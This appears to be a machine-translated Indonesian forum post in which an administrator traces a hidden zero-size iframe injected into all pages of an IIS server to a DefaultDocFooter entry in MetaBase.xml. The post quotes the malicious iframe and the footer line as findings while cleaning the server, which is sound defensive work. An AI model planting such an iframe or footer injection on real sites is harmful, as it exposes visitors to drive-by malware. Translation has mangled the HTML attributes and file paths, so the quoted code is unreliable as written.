Ketika server membuka hampir semua situs web, bahkan halaman HTML pun muncul.
<iframe src=" http://xxxdfsfd/web.htm " tinggi=0 lebar=0></iframe>
Beberapa gaya kode ini ada di bagian kepala dan beberapa di bagian ekor. Perangkat lunak anti-virus akan melaporkan virus ketika dibuka.
Saya tidak dapat menemukan kode ini di kode sumber ketika saya membuka halaman HTML atau ASP PHP.
Analisis alasannya
Pertama, saya mencurigai malware ARP. Saya menggunakan alat anti-ARP dan tidak menemukan spoofing arp.
Selain itu, spoofing arp umumnya tidak dimasukkan ke dalam kode setiap saat, tetapi terkadang dan terkadang
Dan kode ini juga dapat Anda temukan ketika mengakses menggunakan http://127.0.0.1 atau http://localhost
Kemungkinan spoofing arp dihilangkan.
Kemudian saya berpikir bahwa JS mungkin telah dirusak, atau file lain yang disertakan. Setelah mencari, tidak ada halaman yang dimodifikasi yang ditemukan. Bahkan saat menelusuri halaman HTML yang baru dibuat, kode ini akan dimasukkan, sehingga hanya dapat digantung melalui IIS .
Setelah membackup data iis dan kemudian menginstal ulang iis, kodenya hilang. Setelah memulihkan iis yang dicadangkan, masalah muncul lagi.
Setelah mencari dengan cermat, masalahnya terletak pada file konfigurasi IIS. Ketika saya membuka file konfigurasi, saya tidak menemukan potongan kode itu.
Sangat mungkin ada file tertentu yang dipanggil. Bagaimana cara memeriksanya? Tiba-tiba saya teringat Filemon yang terkenal.
Saya mengunduhnya secara lokal dan mengunggahnya ke server. Saya membuka Filemon. Ada terlalu banyak data. Saya memfilter beberapa yang tidak berguna.
Tinggal proses iis saja, dan datanya masih banyak. Sepertinya banyak orang yang mengunjungi situs tersebut di server.
Tutup semua situs dan buat situs pengujian anky. Direktorinya adalah D:www dan buat halaman kosong test.htm di bawah.
Kunjungi halaman ini, kode telah dimasukkan, dan lihat Filemon Aneh cara membaca C:Inetpubwwwrootiisstart.htm
Buka C:Inetpubwwwrootiisstart.htm dan lihat ada
<iframe src=" http://xxxdfsfd/web.htm " tinggi=0 lebar=0></iframe>
Hapus kode dan biarkan kosong. Saat mengakses test.htm, hapus C:Inetpubwwwrootiisstart.htm dan akses lagi.
Di sinilah masalah "Kesalahan membaca file footer data" muncul di test.htm
berkas ini.
Wajar jika Anda menghapus C:Inetpubwwwrootiisstart.htm. Bagaimana cara mengatasinya?
melanjutkan
Apakah mungkin karena ekstensi? Saya sudah memeriksanya di ekstensi dan semuanya normal.
Tentu saja, ada juga Trojan Trojan melalui ISAPI.
Setelah banyak pertimbangan, akhirnya saya merasa ada yang salah dengan file konfigurasinya.
Buka file konfigurasi yang terletak di %windir%system32inetsrvMetaBase.xml
Buka dengan Notepad, cari iisstart.htm dan temukan barisnya. Saya pikir itu adalah situs default pada awalnya, tapi kemudian saya pikir itu salah.
Situs default telah dihapus. Lihatlah lebih dekat kode ini:
DefaultDocFooter="FILE:C:Inetpubwwwrootiisstart.htm"
Hapus baris ini dan masalahnya terpecahkan sepenuhnya.